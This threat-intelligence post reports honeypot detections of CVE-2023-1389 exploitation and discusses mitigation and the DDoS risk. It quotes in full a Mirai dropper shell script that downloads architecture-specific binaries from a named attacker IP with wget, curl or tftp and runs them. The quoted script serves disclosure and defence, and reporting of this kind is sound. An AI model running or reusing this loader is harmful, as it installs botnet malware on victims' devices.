Last week, Jonah Latimer posted here about traffic he saw to his own EC2 web honeypot exploiting CVE-2023-1389. I found this looking at new URL strings to our honepot network, and so for on 29 Nov 23, there have been about 300 detections for this vulnerability pulling a shell script from 45.95.146.26 a quick little shell script that does little more than figure out the architecture of the victim device and then attempt to download a architecture-specific variant of Mirai.

binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146.26"\
binout="system"
exec="your device just got infected to a bootnoot"

rm -rf $binout

for arch in $binarys
  do
    rm -rf $arch
    cd /tmp || cd /var || cd /dev; wget http://$server_ip/g/$arch -O $binout || curl -O $binout http://$server_ip/g/$arch || tftp -g -l $binout -r $arch $server_ip
    chmod 777 $binout
    status=`./$binout $1`
    if [ "$status" = "$exec" ]; then

        rm -rf $binout
        break

    fi
    rm -rf $binout
  done

The same IP hosted those binaries which were first seen on Virustotal on 24 November 2023 (See the ARM version report on VT here).

If you take a look at our own data and generalize the exploit (example here) you see one spike in August and roughly small "noise level" exploitation and then today which so far has surpassed all our previous observation of exploit activity.

The mitigation advice is the same, these devices probably shouldn't have internet facing admin panels but unfortunately the class of device suggests the people running them are also not likely reading such guidance much less have the ability or wherewithall to fix the issue and/or update their firmware.

It should be pointed out that in the current environment of heightened geopolitical activity, DDoS is often the first lever used by individuals who want to project that same conflict online which makes the expansion of Mirai that much more concerning.

--
John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Labs - Well Fed Intelligence